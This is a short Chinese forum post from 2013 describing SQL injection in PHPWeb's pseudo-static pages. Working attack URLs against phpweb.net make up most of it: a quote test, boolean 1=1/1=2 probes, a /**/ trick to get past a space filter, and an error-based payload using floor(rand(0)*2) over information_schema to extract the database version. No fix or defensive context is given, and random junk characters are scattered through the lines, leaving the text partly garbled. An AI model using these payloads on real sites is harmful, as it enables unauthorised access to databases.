phpweb所有的整站程序伪静态页面都存在sql注入
3 e4 A# \" O+ R1 c- [ x9 w+ t7 N0 d2 w$ d+ M1 w
主站:http://phpweb.net/! L+ o' \. B2 z1 x: I$ z3 z
加’检测:- Y% ]3 D# @7 B7 Q
) d0 r, o) S: {% a8 e: _* `# Y# s* rhttp://www.phpweb.net/down/html/?772′.html
: B: V# l }2 |0 b) ^0 X
- a/ ~. }* f0 @/ x D9 v出错$ ^+ M& d5 o# Q; j9 g
存在注入。5 B, J6 M, {" h. y/ r4 t5 J
不能用空格,只能用/*罗
5 F6 N7 V! v K( qhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常/ Q' M+ C5 |: W, Q P3 A, n
$ M, A9 `6 b1 F% M% O( phttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.3 e6 `1 q0 }6 K+ v+ D8 |
爆数据库版本:
) E1 M) A& n# K. s- j ( L0 x/ f. D8 t' c: R# I
?
. w9 \9 @4 E' M A1& V7 ^, u* h: }
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
( x! t5 g3 j1 m% t; f更新日期: 2013-01-03 13:39:50 ) {2 W& f8 Q: n; j; e
|
发表于 2013-1-4 19:46:42
收藏
支持
反对